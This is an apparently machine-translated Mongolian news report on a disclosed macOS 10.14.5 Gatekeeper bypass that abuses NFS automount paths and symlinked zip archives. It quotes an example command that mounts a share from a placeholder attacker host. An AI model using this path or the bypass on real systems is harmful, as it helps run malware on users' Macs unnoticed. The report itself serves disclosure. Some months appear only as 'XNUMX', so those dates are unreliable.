Амая Томан Аюулгүй байдлын судлаач Филиппо Кавалларин өөрийн блог дээрээ macOS 10.14.5-ийн алдааны талаар анхааруулга нийтэлжээ. Энэ нь Gatekeeper-ийн аюулгүй байдлын арга хэмжээг бүрэн тойрч гарах боломжоос бүрддэг. Кавалларины хэлснээр тэрээр энэ оны XNUMX-р сард Apple-д алдаа гаргасныг онцолсон боловч компани хамгийн сүүлийн шинэчлэлтээр үүнийг засаагүй байна.
Gatekeeper программыг Apple компани бүтээж, 2012 онд анх удаа ширээний үйлдлийн системдээ оруулсан. Энэ нь хэрэглэгчийн мэдээлэл, зөвшөөрөлгүйгээр программ ажиллахаас сэргийлдэг механизм юм. Таныг програмыг татаж авсны дараа Gatekeeper программ хангамжид Apple-аас зөв гарын үсэг зурсан эсэхийг шалгахын тулд кодыг автоматаар шалгадаг.
Энэ байж болох юм чамайг сонирхож байна
Кавалларин өөрийн блог нийтлэлдээ Gatekeeper нь анхдагч байдлаар гадаад санах ой болон сүлжээний хувьцааг хоёуланг нь аюулгүй газар гэж үздэг гэж тэмдэглэжээ. Иймд эдгээр зорилтод байгаа аливаа програмыг хаалгачны шалгалтанд орохгүйгээр автоматаар ажиллуулж болно. Энэ нь хэрэглэгчдэд мэдэгдэлгүйгээр хортой программ хангамжийг ажиллуулахын тулд ашиглаж болно.
Зөвшөөрөлгүй хандалтыг зөвшөөрдөг нэг тал бол "/net/" -ээр эхэлсэн замыг зааж өгснөөр хэрэглэгчдэд сүлжээний хуваалцахыг автоматаар холбох боломжийг олгодог automount функц юм. Жишээлбэл, Кавалларин "ls /net/evil-attacker.com/sharedfolder/" замыг иш татсан бөгөөд энэ нь үйлдлийн систем нь алслагдсан байршилд байгаа "sharefolder" хавтасны агуулгыг ачаалахад хүргэж болзошгүй бөгөөд энэ нь хортой байж болзошгүй юм.
Та видеоноос аюул занал хэрхэн ажилладагийг харж болно:
Өөр нэг хүчин зүйл бол хэрэв automount функцэд хүргэдэг тодорхой тэмдэгт холбоос агуулсан зип архивыг хуваалцвал Gatekeeper үүнийг шалгахгүй. Ингэснээр хохирогч хортой архивыг хялбархан татаж аваад задлах боломжтой бөгөөд халдагчид хэрэглэгчийн мэдэлгүйгээр Mac дээр бараг ямар ч программ хангамжийг ажиллуулах боломжийг олгоно. Анхдагч байдлаар тодорхой өргөтгөлүүдийг нуудаг Finder-д энэ эмзэг байдал бас бий.
Apple компани энэ оны хоёрдугаар сарын 22-нд macOS үйлдлийн системийн эмзэг байдалд анхаарлаа хандуулсан гэж Кавалларин блогтоо бичжээ. Гэвч XNUMX-р сарын дундуур Apple компани Кавалларинтай харилцахаа больсон тул Кавалларин бүх зүйлийг олон нийтэд ил болгохоор шийджээ.
Эх сурвалж: FCVL
